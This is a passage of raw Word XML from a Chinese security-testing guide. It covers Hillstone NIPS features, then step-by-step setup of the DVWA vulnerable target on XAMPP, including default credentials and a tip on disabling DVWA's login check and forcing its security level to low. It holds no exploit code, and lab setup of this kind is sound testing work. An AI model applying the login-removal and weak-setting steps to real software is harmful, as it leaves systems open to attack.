      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>日志报表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>支持强大的日志存储和报表分析，能支持查询最近3个月的所有威胁日志，url日志，设备日志等。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>提供多视角、丰富易用的报表，便于用户单位不同职责的管理员从不同视角进行管理。报表内容涵盖安全风险概览、业务系统风险详情、网络威胁详情、网络流量分析和系统运行情况五大项。支持丰富的自定义报表选项，用户可以灵活的定制报表内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>同时也支持日报，周报，月报，季度报表，半年报和年报能多种时间粒度的报别生成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>支持智能功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>支持核心资产服务器的重点监控和未知威胁检测。山石网科入侵检测和防御系列，通过建立主机和服务器的行为数据模型进行异常行为检测，可以有效发现资源消耗型、连接耗尽型、带宽消耗型等DDoS攻击；同时支持服务器HTTP扫描、Spider、SPAM、SSH/FTP弱口令等异常行为的检测。支持多维度威胁关联分析，挖掘未知威胁、异常行为和应用行为之间的关联性，发现潜在网络威胁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006019AE" w:rsidRPr="009655A2" w:rsidRDefault="006019AE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>支持云景和云沙箱功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>支持云景功能，能将设备上状态和威胁日志和系统日志信息上传到云端，方便用户在云端或者手机APP上实时查看。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NIPS支持沙箱功能，是对安全威胁检测手段的一个补充和增强。沙箱在虚拟环境中执行可疑文件，收集可疑文件的动态行为，并对这些动态行为进行分析。沙箱可以发现传统安全软件发现不了的高级威胁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00725DEE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc499884682"/>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用</w:t>
      </w:r>
      <w:r w:rsidR="00E75A23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试工具介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00AA2791" w:rsidRPr="009655A2" w:rsidRDefault="00AA2791" w:rsidP="00AA2791">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc499884683"/>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用靶机的搭建介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在进行安全渗透测试的过程中，我们常常需要用到靶机作为攻击对象，通过使用不同的检测手段探测攻击对象上存在的漏洞并尝试进行攻击，从而检验安全防御设备对此类的行为能否进行检测拦截。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下面就介绍一些常见的渗透测试靶机的安装搭建方法以及使用说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00AA2791" w:rsidP="000E4EBE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Toc499884684"/>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:t>VWA:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DVWA全称“</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Damn Vulnerable Web Application</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”，是一个可以模拟包含各种常见漏洞（如sql注入、XSS、CSRF等）的web应用，网站提供不同的漏洞防御等级，可以帮助网络安全专家测试防火墙设备的功能和攻击防护效果、可以帮助网站开发人员更好的理解各种web攻击的原理并在开发过程中避免漏洞的发生，可以帮助网络从业者学习web安全的知识</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，同时也是进行安全渗透测试的给力平台</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00AA2791" w:rsidP="00AA2791">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve">3.1.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:t>DVWA</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安装</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DVWA需要依赖httpd、PHP、MySQL、php-mysql等应用或组件，最简单的方法是安装xampp（可以从官网下载，xampp只有32位的，安装前需要安装对应版本的vc，一般安装文件名会指明需要的vc版本</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</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X</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ampp的下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:cs="宋体"/>
            <w:color w:val="auto"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.apachefriends.org/download.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VC</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:cs="宋体"/>
            <w:color w:val="auto"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.microsoft.com/zh-cn/download/details.aspx?id=48145</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ampp</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安装时最好安装在根目录下，确保安装过程没有报错，安装完了所需的各种依赖部件全部搞定，之后是DVWA的安装和配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下载DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="175" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.dvwa.co.uk/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2、解压缩DVWA安装包到D:\xampp\htdocs\目录下,这里xampp是安装在D盘根目录下的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、打开/xampp/htdocs/DVWA/config/config.inc.php,将</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 xml:space="preserve">$_DVWA['db_user'] = 'root' </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_DVWA[''db_password] = 'p@ssw0rd'</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改为</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 xml:space="preserve">$_DVWA[ 'db_user' ] = 'root' </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_DVWA[ 'db_password' ] = ''</w:t>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因为XAMPP中mysql的默认用户名root密码为空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. 打开XAMPP Control Panel，开启apache和mysql服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF00DDC" wp14:editId="0A50A8D0">
            <wp:extent cx="5274310" cy="2967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7355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>要确保可以进入</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://localhost/phpmyadmin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5、在</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>地址栏输入 http://localhost/DVWA/setup.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5368D8A7" wp14:editId="784C5522">
            <wp:extent cx="5274310" cy="4348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48480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6、进入setup界面，点击“Create/Reset Database”，提示成功后进行下一步。如果出现“Could not connect to the database - please check the config file.”的错误信息，那么请参照步骤3修改密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7、进入链接 http://localhost/DVWA/login.php，默认的用户名和密码为“admin/password”，进入后将DVWA的安全等级按需要修改</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，然后就可以进行各项漏洞的攻击测试了</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="236AEAB8" wp14:editId="57BB67F0">
            <wp:extent cx="5274310" cy="53206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20665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00AA2791">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用时的技巧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我们在平时测试时常会用到漏扫工具以及其他测试工具对DVWA上的漏洞进行扫描，为简化测试过程，希望可以取消dvwa的登录限制，并让DVWA默认处于低安全等级有漏洞的状态（默认DVWA的安全等级是impossible），下面就介绍下如何取消dvwa的登录和设置默认的安全等级为low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>取消登陆</w:t>
      </w:r>
    </w:p>
    <w:p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DVWA在渗透测试方面表现相当不错，可以自定义高中低的安全级别。测试工具需要取消登录</w:t>
      </w:r>
    </w:p>
    <w:p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DVWA版本:Damn Vulnerable Web Application (DVWA) v1.10 *Development*</w:t>
      </w:r>
    </w:p>
    <w:p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更改文件：\DVWA\dvwa\includes\dvwaPage.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p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更改代码: dvwaIsLoggedIn 函数</w:t>
      </w:r>
    </w:p>
    <w:p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原始函数定义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
